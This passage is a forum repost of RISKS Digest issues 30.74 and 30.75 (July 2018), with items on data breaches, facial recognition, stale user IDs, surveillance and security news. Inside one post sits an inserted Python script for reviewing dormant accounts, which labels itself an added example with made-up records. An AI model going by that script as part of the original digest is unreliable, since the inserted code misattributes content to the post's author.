    imposed restrictions that prohibited tobacco advertisements toward young
    people -- a core audience for addictive products, and a business model
    impediment that penalizes income capture potential.

    Hypothetically, would substitution of ``mobile devices, apps, and social
    media'' for ``tobacco'' (the MOBASS MSA?) in an equivalent agreement be viable?
    The epidemiological evidence, per states' public health system impact to
    date, might not immediately substantiate this extrapolation. As evidence
    linking tobacco usage to illness accumulated from the 1950s through 1990s,
    so might evidence of screen addiction disorder and the effects it
    introduces.

    The spectacle of mobile device, social media, and application vendors called
    to testify under oath before Congress that ``our products are not addictive''
    would rival the perjury committed by tobacco industry executive
    predecessors. Michael Mann's ``The Insider''
    (http://www.imdb.com/title/tt0140352/?ref_=nv_sr_2) might need a sequel!

    ------------------------------

    Date: Sun, 1 Jul 2018 22:43:10 +0100
    From: Michael Kent <michae...@37.org.uk>
    Subject: Ticketmaster: How not to manage customers after a data breach.

    Like many in the UK I was contacted by Ticketmaster to let me know that my
    data might have been accessed through malicious software on the servers of a
    third party service provider. They have very kindly offered me a year's free
    identity monitoring by Experian.

    The issue? The email tells me to sign up by...

    "Visit the Data Patrol website to get started:
    http://my.garlik.com/garlik-ui/expnuk/login
    http://click.customerservice.tmm.ticketmaster.co.uk ...

    Not a Ticketmaster site, not an Experian site, just a site that screams
    ***SCAM***!!!

    A minute or two googling tells me that this is probably the legitimate
    service provider but this really isn't how to give customers confidence that
    you take security seriously!

    ------------------------------

    Date: Mon, 2 Jul 2018 15:24:10 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Police, Law Enforcement, and corporate use of facial
    recognition and facial images in court (RISKS-30.73)

    This has been used in British Columbia for a decade, has proved quite
    effective, and is pretty much settled case law in both Criminal and Civil
    cases.

    In BC Driver Licencing and BC Service Card issuing for the BC Medical
    Services Plan have been offloaded out of core government to a Crown
    Corporation, the Insurance Corporation of BC. Photo ID Service Cards for MSP
    are a relatively new development. The Original BC ``Care Cards'' did not have
    photos and involved little or no verification of the identity of who they
    were issued to. BC Residents have the option of combining the BC Service
    Card and BC Driver's Licence into one card, or having separate cards. Most
    Privacy Professionals I have discussed this with chose to have separate
    cards. I have overnight dialysis in a clinic 3 times a week, so I just take
    my BC Service Card and a transit pass with me.

    The BC Liquor Control Board used to issue its own Photo ID cards, decades
    ago, but those were also offloaded onto ICBC as ``BC ID Cards'' for people who
    did not have a BC Driver's Licence, such as a former premier who surrendered
    his DL after being caught driving under the influence in Hawaii.

    There have been at least two widely reported instances where Facial
    Recognition has been used to trigger investigations, or to identify
    criminals from photos.

    After the 2011 Stanley Cup Riot in Vancouver ICBC offered to scan its Facial
    Image DB, using the same recognition software that ICBC began using in 2008,
    without notice to customers, to detect attempts at Driver's Licence
    Fraud. ICBC had a vested interest in identifying the Rioters who damaged or
    destroyed automobiles insured by ICBC and later sued at least 46 people in
    Civil Actions. Facial Images flagged as possible Fraud attempts are reviewed
    by Police, not by ICBC employees. Biometric factors such as height, weight,
    and eye colour are also used in the matching, not just Facial Recognition.

    http://www.burnabynow.com/news/six-burnaby-defendants-in-icbc-stanley-cup-riot-civil-suit-1.1896960

    BC Information and Privacy Commissioner Elizabeth Denham ruled that ICBC
    could only do that with due process. Police turned to the Internet and
    crowd sourced identification of the rioters from pictures posted on the
    web. That turned out to be very effective, resulting in tips about the names
    of hundreds of rioters. Human eyes still beat facial recognition?

    http://www.macleans.ca/news/last-two-stanley-cup-rioters-sentenced-to-time-behind-bars-for-assault/

    ``Prosecutors laid 912 charges against 300 suspects, and 284 people pleaded
    guilty. Another six had the charges against them stayed, while 10 went to
    trial, resulting in nine convictions and one acquittal.''

    Elizabeth Denham is now the UK Data Commissioner responsible for
    investigating the Cambridge Analytica scandal.

    http://www.cbc.ca/news/canada/briti...facial-recognition-to-track-rioters-1.1207398

    http://www.oipc.bc.ca/investigation-reports/1245

    Executive Summary [8] ``I conclude that ICBC must immediately cease
    responding to requests from police to use the facial recognition database
    for the purposes of identifying individuals for police absent a subpoena,
    warrant or court order.''

    ICBC's undisclosed use of Facial Recognition to detect attempts at DL Fraud
    became public knowledge when RCMP arrived at a Government Office in Victoria
    to arrest a Civil Servant who had a meteoric rise under the name Richard
    Perran. That turned out to be a family affair, with his wife also working in
    the BC Public Service under a stolen identity. He had also obtained a Public
    Service subsidized Master's Degree from the University of Victoria, and
    tried to leverage that into a PhD under the stolen name after being
    convicted, despite being ordered to stop using the stolen name as a
    condition of sentencing and probation.

    http://www.timescolonist.com/icbc-f...altering-record-to-get-government-job-1.21668
    http://bctrialofbasi-virk.blogspot.com/2009/12/police-probe-hiring-of-bc-civil-servant.html
    http://www.pressreader.com/canada/times-colonist/20120617/281479273491097

    ------------------------------

    Date: Mon, 2 Jul 2018 16:00:39 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (RISKS-30.72,73)

    Did Security Administrators at the National Instant Criminal Background
    Check System (NICS) detect the fact that IDs were not being used and ask why
    the users were not using assigned IDs? If so did they pursue that with
    management in the Florida Department of Agriculture and Consumer Services?
    The report cited in RISKS says that the Florida OIG detected the issue.

    I was a top-level RACF Security Admin for the BC Ministry of Health from
    1980 until 2016, first in the BC Public Service and later as a Contracted
    Resource working for a world scale IT Services company with its HQ in
    Montreal.

    One of the auto generated routine reports that I had to review was a report
    of IDs that had expired passwords because the User had not changed the
    password for more than 60 days.

    Last-Use Date was also tracked.

    Part of my job was repeatedly nagging user supervisors about whether the
    person the ID was issued to was still working in a position that required
    access, based on the expired password and the last use date.

    Repeating the query at regular intervals was part of my job even though it
    tended to make me seem like a broken record.

    Responding to requests for new user IDs was something I used to revisit the
    matter. That is, why did the area need a new user ID when it had been issued
    positional IDs that had not been used in years, or even decades.

    Positional IDs are associated with a specific job function.

    If a user leaves, or changes job roles they get a new ID associated with the
    new role. The old ID should be reassigned, deactivated, or deleted as part of
    that transition.
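
    A stale-ID review of the kind this post describes (expired-password report,
    last-use date, positional IDs, and questioning a new-ID request when the area
    already holds unused IDs), as an added example that is not the post's or
    RACF's code; the record layout, the 365-day dormancy threshold and the sample
    IDs are assumptions:

```python
"""Stale user-ID review modelled on the routine reports described in the post:
passwords not changed for more than 60 days, last-use dates, and positional IDs
that should be reassigned, deactivated or deleted when a role changes.
Added example, not code from the post or from RACF; the record format and the
365-day dormancy threshold are assumptions."""
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional

PASSWORD_MAX_AGE_DAYS = 60   # the 60-day password-change rule mentioned in the post
DORMANT_AFTER_DAYS = 365     # assumed: no use for a year counts as dormant


@dataclass(frozen=True)
class UserId:
    userid: str
    position: str              # positional ID: the job function it was issued for
    created: date
    password_changed: date
    last_use: Optional[date]   # None means the ID has never been used


def password_age_days(rec: UserId, today: date) -> int:
    """Days since the password was last changed."""
    return (today - rec.password_changed).days


def idle_days(rec: UserId, today: date) -> int:
    """Days since last use; for a never-used ID, days since it was created."""
    return (today - (rec.last_use or rec.created)).days


def classify(rec: UserId, today: date) -> str:
    """Most severe finding first: never-used, dormant, expired-password, ok."""
    if rec.last_use is None:
        return "never-used"
    if idle_days(rec, today) > DORMANT_AFTER_DAYS:
        return "dormant"
    if password_age_days(rec, today) > PASSWORD_MAX_AGE_DAYS:
        return "expired-password"
    return "ok"


def supervisor_report(records: List[UserId], today: date) -> Dict[str, List[str]]:
    """Group findings by position so each supervisor can be asked whether the
    holder still needs access. IDs classified 'ok' are omitted."""
    report: Dict[str, List[str]] = {}
    for rec in records:
        status = classify(rec, today)
        if status == "ok":
            continue
        line = (f"{rec.userid}: {status}, password age {password_age_days(rec, today)}d,"
                f" idle {idle_days(rec, today)}d")
        report.setdefault(rec.position, []).append(line)
    return report


def review_new_id_request(position: str, records: List[UserId], today: date) -> List[str]:
    """Before issuing a new ID for a position, list that position's existing IDs
    that are dormant or never used; the requester should say why those cannot be
    reassigned, or have them deleted first."""
    return [rec.userid for rec in records
            if rec.position == position
            and classify(rec, today) in ("dormant", "never-used")]


# Constructed sample records (not real data).
TODAY = date(2018, 7, 2)
SAMPLE = [
    UserId("CLM001", "claims-clerk", date(2016, 3, 1), date(2018, 6, 20), date(2018, 7, 1)),
    UserId("CLM002", "claims-clerk", date(2016, 3, 1), date(2018, 1, 15), date(2018, 6, 30)),
    UserId("CLM003", "claims-clerk", date(2009, 5, 4), date(2012, 2, 10), date(2012, 3, 1)),
    UserId("REG010", "registrar", date(2017, 11, 1), date(2017, 11, 1), None),
]

if __name__ == "__main__":
    for position, lines in supervisor_report(SAMPLE, TODAY).items():
        print(position)
        for line in lines:
            print("  " + line)
    print("unused IDs already issued to claims-clerk:",
          review_new_id_request("claims-clerk", SAMPLE, TODAY))
```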

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.74
    ************************
     
  10. LakeGator

    Risks Digest 30.75

    RISKS List Owner

    Jul 14, 2018 5:48 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 14 July 2018 Volume 30 : Issue 75

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> and
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    The return of Spectre (ZDNet)
    Grand Pwning Unit: Accelerating microarchitectural attacks with the GPU
    (Colyer)
    Now-fixed iOS 11.3 bug reveals how Apple censors the Taiwanese
    flag on Chinese iPhones (9to5Mac)
    FAA pushes back on Boeing exemption for 787 safety flaw (FlightGlobal)
    Regulation of facial-recognition software? (WashPo)
    FACEPTION (Facial Personality Analytics)
    How Smart TVs in Millions of Homes Track More Than What's On Tonight
    (NYTimes)
    Meet Scrub 50, the robot cleaner (StraitsTimes)
    Video: Gavin Williamson hilariously interrupted by Siri during
    statement to Parliament (9to5Mac)
    How Voice-Activated Assistants Pose Security Threats in Home, Office
    (EWeek)
    A Revised View of the IoT Ecosystem (Vinton Cerf, Computing Edge)
    Plan to use AI to help emergency call operators (The Straits Times)
    Hamas uses fake Facebook friends to dupe 100 soldiers into
    downloading spyware (The Times of Israel)
    Chinese hackers infiltrate systems at Australian National University
    (John Colville)
    Data encryption: How to avoid common workarounds (HPE)
    CRTC levies fines against two companies under Canada's anti-spam law
    (Kelly Bert Manning)
    Cameras to be deployed to detect illegal smoking (The Straits Times)
    PayPal Apologizes for Letter Demanding Payment From Woman Who Died
    of Cancer (NYTimes)
    ExxonMobil Bungles Rewards Card Debut (Krebs on Security)
    This keyboard attack steals passwords by reading heat from your
    fingers (Charlie Osborne)
    iOS 11.4 seems to have a battery drain problem (ZDNet)
    Watch that keyboard! (Web Informant)
    How the Pentagon Keeps Its App Store Secure (WiReD)
    Inside China Dystopian Dreams (NYTimes)
    Egypt Sentences Lebanese Tourist to 8 Years in Prison for Facebook
    Video (NYTimes)
    The Complexity of Simply Searching For Medical Advice (WiReD)
    According to Apple's digital assistant Siri, Marvel comic book legend
    Stan Lee had apparently died on Monday (Business Insider Singapore)
    Risk and cost/benefit ... (Rob Slade)
    Employees as subjects in clinical trials (Bob Fenichel)
    Re: Google is training machines to predict when a patient will die
    (John R. Levine, Richard M Stein, John R. Levine)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 12 Jul 2018 00:13:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The return of Spectre (ZDNet)

    Two new ways to assault computers using Spectre-style attacks have been
    discovered. These can be used against any operating system running on AMD,
    ARM, and Intel processors.

    The return of Spectre | ZDNet

    ------------------------------

    Date: Wed, 4 Jul 2018 18:23:00 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grand Pwning Unit: Accelerating microarchitectural attacks with
    the GPU (Colyer)

    Grand Pwning Unit: Accelerating microarchitectural attacks with the GPU

    ------------------------------

    Date: Thu, 12 Jul 2018 00:00:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Now-fixed iOS 11.3 bug reveals how Apple censors the Taiwanese
    flag on Chinese iPhones (9to5Mac)

    A bug in iOS 11.3 --- fixed in iOS 11.4.1 --- revealed that Apple
    censors the Taiwanese flag on iPhones whose region is set to China

    The bug came to light when security researcher Patrick Wardle received a
    message from a Taiwanese friend, reporting that iMessage, WhatsApp and
    Facebook Messenger all crashed when she typed the word `Taiwan' or received
    a message containing the emoji for the Taiwanese flag.

    He was initially skeptical, but was able to verify the claim and --- by a
    somewhat tortuous process --- work out what was causing it.

    On an iOS device with CN (China) set as the language/locale, iOS is looking
    for the Taiwanese flag emoji and then removing it. That code was buggy,
    which was what caused the crash.

    Now-fixed iOS 11.3 bug reveals how Apple censors the Taiwanese flag on Chinese iPhones

    ------------------------------

    Date: Fri, 6 Jul 2018 20:44:05 +0100
    From: <ric...@hesketh.org.uk>
    Subject: FAA pushes back on Boeing exemption for 787 safety flaw
    (FlightGlobal)

    FAA pushes back on Boeing exemption for 787 safety flaw

    Exec summary: In order to meet a delivery schedule, Boeing would like the
    FAA to trust that some software which may contain bugs will provide a safety
    net in the event that other software containing a known defect causes an
    engine shutdown.

    ------------------------------

    Date: Sat, 14 Jul 2018 08:46:31 -0700
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Regulation of facial-recognition software? (WashPo)

    Microsoft is calling for government regulation on facial-recognition
    software, one of its key technologies, saying such artificial
    intelligence is too important and potentially dangerous for tech
    giants to police themselves.

    Microsoft calls for regulation of facial recognition, saying it’s too risky to leave to tech industry alone

    ------------------------------

    Date: Sun, 8 Jul 2018 13:45:07 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: FACEPTION (Facial Personality Analytics)

    FACEPTION IS A FACIAL PERSONALITY ANALYTICS TECHNOLOGY COMPANY

    We reveal personality from facial images at scale to revolutionize how
    companies, organizations and even robots understand people and dramatically
    improve public safety, communications, decision-making, and experiences.

    http://www.faception.com/

    ------------------------------

    Date: Fri, 06 Jul 2018 13:15:22 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: How Smart TVs in Millions of Homes Track More Than What's On
    Tonight (NYTimes)

    http://mobile.nytimes.com/2018/07/05/business/media/tv-viewer-tracking.html

    The growing concern over online data and user privacy has been focused on
    tech giants like Facebook and devices like smartphones. But people's data is
    also increasingly being vacuumed right out of their living rooms via their
    televisions, sometimes without their knowledge. [...]

    Once enabled, Samba TV can track nearly everything that appears on the TV on
    a second-by-second basis, essentially reading pixels to identify network
    shows and ads, as well as programs on Netflix and HBO and even video games
    played on the TV. Samba TV has even offered advertisers the ability to base
    their targeting on whether people watch conservative or liberal media
    outlets and which party's presidential debate they watched.

    ------------------------------

    Date: Fri, 06 Jul 2018 08:33:48 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Meet Scrub 50, the robot cleaner (StraitsTimes)

    http://www.straitstimes.com/singapore/meet-scrub-50-the-robot-cleaner

    Visitors to Singapore, a city-state of ~5.6m citizens and expatriates, often
    note the gumblob-free sidewalks, garbage-free streets, and spotless trains.

    In truth, Singapore is cleaned daily by an army of mop and broom-wielding
    custodians estimated to top ~70K in 2016
    http://www.straitstimes.com/singapo...million-people-70000-cleanersthats-ridiculous).

    Many are senior citizens earning minimum wages to supplement their
    retirement. Demographically, custodians are diminishing, and few young
    people wish to pursue this career path.

    Enter Scrub 50, which aspires to replace these workers and fill the human
    deficit.

    ``For example, daily scrubbing of 5,000 sq m over a one-month period would
    require a cleaner to put in 300 hours of work, but the robot takes 130
    hours, its developers claim.''

    Advocates of universal income guarantees should take note of any trial
    deployment and outcome, including robo-mopping incidents.

    ------------------------------

    Date: Thu, 5 Jul 2018 19:37:19 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Video: Gavin Williamson hilariously interrupted by Siri during
    statement to Parliament (9to5Mac)

    We've all had it happen before, Siri going off when your iPhone thinks it
    heard the *Hey Siri* command when nothing remotely close was mentioned.

    Well, today this happened in a public environment and it was
    absolutely hilarious. As tweeted by BBC Parliament, Siri made a brief
    interruption while Gavin Williamson was making a statement.

    From what we can hear, it sounds like surrounding areas triggered the
    Hey Siri command on the phone, which prompted Siri to respond on the
    iPhone.

    False positives with voice assistants are always fun, especially when it
    falsely catches the trigger phrase, but gets every word after that
    verbatim. We can only hope for Apple to keep improving its machine learning
    so things like this won't happen in the future.

    Check out the full clip below.

    http://9to5mac.com/2018/07/03/siri-hijacks-bbc-parliament-statement/

    Only today, I commanded my iPad -- which ignored me, but my wife's nearby
    iPhone responded.

    ------------------------------

    Date: Fri, 6 Jul 2018 11:44:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How Voice-Activated Assistants Pose Security Threats in Home, Office
    (EWeek)

    http://www.eweek.com/security/five-ways-digital-assistants-pose-security-threats-in-home-office

    What a surprise, hmmm?

    ------------------------------

    Date: Thu, 5 Jul 2018 09:16:46 -0400
    From: George Sherwood <sher...@transedge.com>
    Subject: A Revised View of the IoT Ecosystem (Vinton Cerf, Computing Edge)

    An IoT ensemble must actually be in a kind of continuous configuration
    mode, anticipating the arrival and departure of all manner of
    Internet-enabled devices. Among the implications is the notion that
    the local IoT management system needs to expect that new devices will
    need to be configured into the system and others to depart - it needs
    to sense their arrivals and departures and to react accordingly.

    Here's a scary thought: what if a device is adopted that's corrupted, and it
    has a backdoor allowing remote access to a residential network of devices?

    http://www.computer.org/csdl/mags/ic/2017/05/mic2017050072.pdf

    ------------------------------

    Date: Thu, 12 Jul 2018 12:18:35 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Plan to use AI to help emergency call operators (The Straits Times)

    http://www.straitstimes.com/singapore/plan-to-use-ai-to-help-emergency-call-operators

    ``With Singapore's emergency dispatch phone operators receiving almost
    200,000 calls for assistance a year, every minute is vital. In an effort
    to ease their workload, the Singapore Civil Defence Force (SCDF) and four
    other government agencies are turning to artificial intelligence (AI),
    using a speech recognition system developed to transcribe and log each
    call received in real time - even if it is in Singlish.''

    The Straits Times article states the platform possesses a 90% speech-to-text
    recognition accuracy rate based on an 80K-word Mandarin & English dictionary.
    The dictionary was constructed manually from YouTube, SoundCloud and
    Singapore radio programs where mixed language (Malay, Hokkien, Mandarin, and
    English) conversations are routine among Singaporeans.

    A high incidence of emergency operator post-traumatic stress disorder
    and critical incident stress syndrome is reported from the field (see
    https://www.factretriever.com/911-emergency-call-facts, retrieved on
    12JUL2018).

    http://www.nena.org/page/911Statistics
    estimates ~240M emergency (911) calls per year in the US, with ~15-20%
    identified as non-emergencies. ~80% estimated from mobile devices. In
    Singapore, mobile devices dominate; this figure is probably much
    higher. Landline v. mobile emergency call statistics are not readily
    available in Singapore.

    Given a 15-20% non-emergency usage of 911 (999 in Singapore), ~30-40K
    calls/year of a non-emergency basis in Singapore might accidentally arise.

    The risk is that automatic speech-to-text transcription does not suppress
    false emergency dispatch incident density based on the logged
    content. Unclear from the article if there's a human involved to inspect the
    transcription and arbitrate dispatch.

    [1] Jesse Jarnow, Why Our Crazy-Smart AI Still Sucks at Transcribing
    Speech, claims ~12% speech-to-text error rate
    http://www.wired.com/2016/04/long-form-voice-transcription/

    [2] Liam Tung, Microsoft's newest milestone? World's lowest error rate
    in speech recognition
    http://www.zdnet.com/article/micros...rlds-lowest-error-rate-in-speech-recognition/

    ------------------------------

    Date: Thu, 5 Jul 2018 15:11:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Hamas uses fake Facebook friends to dupe 100 soldiers into
    downloading spyware (The Times of Israel)

    Military intelligence officers say no damage to security after soldiers fall
    for terror group cyberplot, sign up for fake World Cup and dating apps

    http://www.timesofisrael.com/idf-wa...-spy-on-them-with-fake-dating-world-cup-apps/

    ------------------------------

    Date: Sat, 7 Jul 2018 07:25:17 +0000
    From: John Colville <John.C...@uts.edu.au>
    Subject: Chinese hackers infiltrate systems at Australian National University

    Australian National University is one of Australia's top research
    universities

    http://www.abc.net.au/news/2018-07-...te-anu-it-systems/9951210?WT.ac=statenews_act

    Hackers based in China have infiltrated one of Australia's most prestigious
    universities, and the threat is yet to be shut down. The ABC has been told
    the Australian National University (ANU) system was first compromised last
    year. In a statement, the ANU said it had been working with intelligence
    agencies for several months to minimise the impact of the threat.

    ------------------------------

    Date: Mon, 9 Jul 2018 23:34:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Data encryption: How to avoid common workarounds (HPE)

    Sloppy practice by data security personnel can, and often does, allow clever
    hackers to gain access to the data without actually defeating the encryption
    algorithms. Learn what measures to take to prevent such security breaches.
    http://www.hpe.com/us/en/insights/articles/data-encryption-how-to-avoid-common-workarounds-1807.html

    ------------------------------

    Date: Thu, 12 Jul 2018 11:25:53 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: CRTC levies fines against two companies under Canada's anti-spam
    law

    The companies involved did not send spam themselves, they provided ISP
    services for malware spreaders and ``accepted unverified and anonymous
    customers''.

    ``Our enforcement actions send a clear message to companies whose business
    models may enable these types of activities,'' said Steven Harroun, the
    CRTC's chief compliance and enforcement officer. Through their actions
    and omissions, Datablocks and Sunlight Media aided in the commission of
    acts contrary to section 8 of the Act.

    http://crtc.gc.ca/eng/archive/2018/vt180711.htmh
    http://www.timescolonist.com/crtc-l...anies-under-canada-s-anti-spam-law-1.23365348

    ------------------------------

    Date: Tue, 10 Jul 2018 10:04:29 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Cameras to be deployed to detect illegal smoking
    (The Straits Times)

    http://www.straitstimes.com/singapore/cameras-to-be-deployed-to-detect-illegal-smoking

    ``As smoking curbs are extended, the number of offenders has increased. The
    NEA [National Environment Agency] issued about 22,000 tickets last year to
    people smoking at prohibited areas, compared with 19,000 in 2016.''

    High-resolution IR cameras positioned to detect smokers in prohibited areas
    supplemented with visual facial recognition matching to ID
    offenders. Another example of surveillance sensor fusion to find and fine
    scofflaws.

    Singapore's governance model, an example of *benign* authoritarianism,
    emphasizes civil order. Suppressing second-hand smoke exposure is a hot
    enforcement priority for public health initiatives.

    The CDC estimates that ~41K US citizens die annually from secondhand smoke-
    related diseases (principally heart and lung diseases). Assuming US
    population of 340m, and Singapore's is ~5.6m, the arithmetic gives:
    5.6m/340m * 41Kcitizens ~= 675 annual deaths per year in Singapore
    attributed to secondhand smoke-related diseases.
    <https://www.cdc.gov/tobacco/data_statistics/fact_sheets/secondhand_smoke/general_facts/index.htm>

    ------------------------------

    Date: Thu, 12 Jul 2018 09:44:08 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: PayPal Apologizes for Letter Demanding Payment From Woman Who Died
    of Cancer (NYTimes)

    http://www.nytimes.com/2018/07/11/business/paypal-dead-wife-husband-letter-nyt.html

    ``We have received notice that you are deceased,'' said the
    letter, which threatened legal action over outstanding debt and left the
    British woman's husband `incredulous'.

    ------------------------------

    Date: Mon, 9 Jul 2018 17:00:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: ExxonMobil Bungles Rewards Card Debut (Krebs on Security)

    Energy giant ExxonMobil recently sent snail mail letters to its Plenti
    rewards card members stating that the points program was being replaced with
    a new one called Exxon Mobil Rewards+. Unfortunately, the letter includes a
    confusing toll-free number and directs customers to a parked page that tries
    to foist Web browser extensions on visitors.

    The mailer (the first page of which is screenshotted below) urges customers
    to visit exxonmobilrewardsplus[dot]com, to download its mobile app, and to
    call 1-888-REWARD with any questions. It may not be immediately obvious, but
    that + sign is actually the same thing as a zero on the telephone keypad
    (although I'm ashamed to say I had to look that up online to be sure).

    http://krebsonsecurity.com/2018/07/exxonmobil-bungles-rewards-card-debut/

    ------------------------------

    Date: Thu, 05 Jul 2018 18:30:17 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: This keyboard attack steals passwords by reading heat from your
    fingers (Charlie Osborne)

    Charlie Osborne for Zero Day, 5 Jul 2018
    Thermanator harvests thermal energy to steal passwords directly from your
    fingertips. A new attack has been presented by researchers which is able to
    record thermal residue from keyboards in order to steal credentials.

    http://www.zdnet.com/article/this-attack-steals-your-passwords-by-reading-keyboard-heat/

    ------------------------------

    Date: Mon, 9 Jul 2018 16:45:04 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: iOS 11.4 seems to have a battery drain problem (ZDNet)

    http://www.zdnet.com/article/ios-11-4-seems-to-have-a-battery-drain-problem/

    Every iOS upgrade? I've deferred this one, in spite of advice given to
    always upgrade quickly for security patches.

    ------------------------------

    Date: Mon, 9 Jul 2018 16:42:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Watch that keyboard! (Web Informant)

    Here is the thing. In order to install one of these keyboard apps, you have
    to grant it access to your phone. This seems like common sense, but sadly,
    this also grants the app access to pretty much everything you type, every
    piece of data on your phone, and every contact of yours too. Apple calls
    this full access, and they require these keyboards to ask explicitly for
    this permission after they are installed and before you use them for the
    first time. Many of us don't read the fine print and just click yes and go
    about our merry way.

    http://blog.strom.com/wp/?p=6603

    ------------------------------

    Date: Sun, 8 Jul 2018 23:37:27 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How the Pentagon Keeps Its App Store Secure (WiReD)

    ``NGA is kind of a unique combat-support agency,'' Saffel says. ``With the
    GEOINT App Store we chose to go into a very risky new frontier for DOD and
    the government in general, but I think we've demonstrated that we can do
    things differently and still be secure and still control access. We're
    supporting a lot of different mission sets, and I expect that the app store
    will keep growing.''

    http://www.wired.com/story/dod-app-store-does-this-one-crucial-thing-to-stay-secure

    ------------------------------

    Date: Sun, 8 Jul 2018 18:54:40 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: Inside China Dystopian Dreams (NYTimes)

    http://www.nytimes.com/2018/07/08/business/china-surveillance-technology.html

    In the Chinese city of Zhengzhou, a police officer wearing facial
    recognition glasses spotted a heroin smuggler at a train station.

    In Qingdao, a city famous for its German colonial heritage, cameras powered
    by artificial intelligence helped the police snatch two dozen criminal
    suspects in the midst of a big annual beer festival.

    In Wuhu, a fugitive murder suspect was identified by a camera as he bought
    food from a street vendor.

    With millions of cameras and billions of lines of code, China is building a
    high-tech authoritarian future. Beijing is embracing technologies like
    facial recognition and artificial intelligence to identify and track 1.4
    billion people. It wants to assemble a vast and unprecedented national
    surveillance system, with crucial help from its thriving technology
    industry.

    http://rinzewind.org/blog-es

    [Also noted by Richard M Stein. PGN]

    ------------------------------

    Date: Sun, 8 Jul 2018 08:53:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Egypt Sentences Lebanese Tourist to 8 Years in Prison for Facebook
    Video (NYTimes)
    via NNSquad
    http://www.nytimes.com/2018/07/07/w...ces-lebanese-tourist.html?partner=rss&emc=rss

    An Egyptian court sentenced a Lebanese tourist to eight years in prison on
    Saturday after she posted a video tirade on her Facebook page that
    Egyptian authorities claimed had insulted the country and its leader. The
    news website Ahram reported that Mona el-Mazbouh was initially handed an
    11-year sentence and a fine after she was convicted of ``deliberately
    broadcasting false rumors which aim to undermine society and attack
    religions.

    ------------------------------

    Date: Sun, 8 Jul 2018 23:34:51 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Complexity of Simply Searching For Medical Advice (WiReD)

    As we increasingly rely on search and on social to answer questions that
    have a profound impact on both individuals and society, especially where
    health is concerned, this difficulty in discerning, and surfacing, sound
    science from pseudo-science has alarming consequences. Will we have to fight
    the battle of keyword voids at a grassroots level, wrangling with the
    asymmetry of passion by tapping people to find these voids and create
    counter-content? Do we need to organize counter-GoFundMe campaigns to pay
    for ad campaigns that promote real science? Or will the tech platforms where
    this is occurring begin to understand that giving legitimacy to health
    misinformation via high search and social rankings is profoundly harmful?
    Getting high-quality, fact-based health information shouldn't be dependent
    on the outcome of SEO games, or on who has more resources for pay-to-play
    content promotion.

    Ultimately, the question is, how do we incorporate factual accuracy into
    rankings when no one is willing to be the *arbiter of truth*.
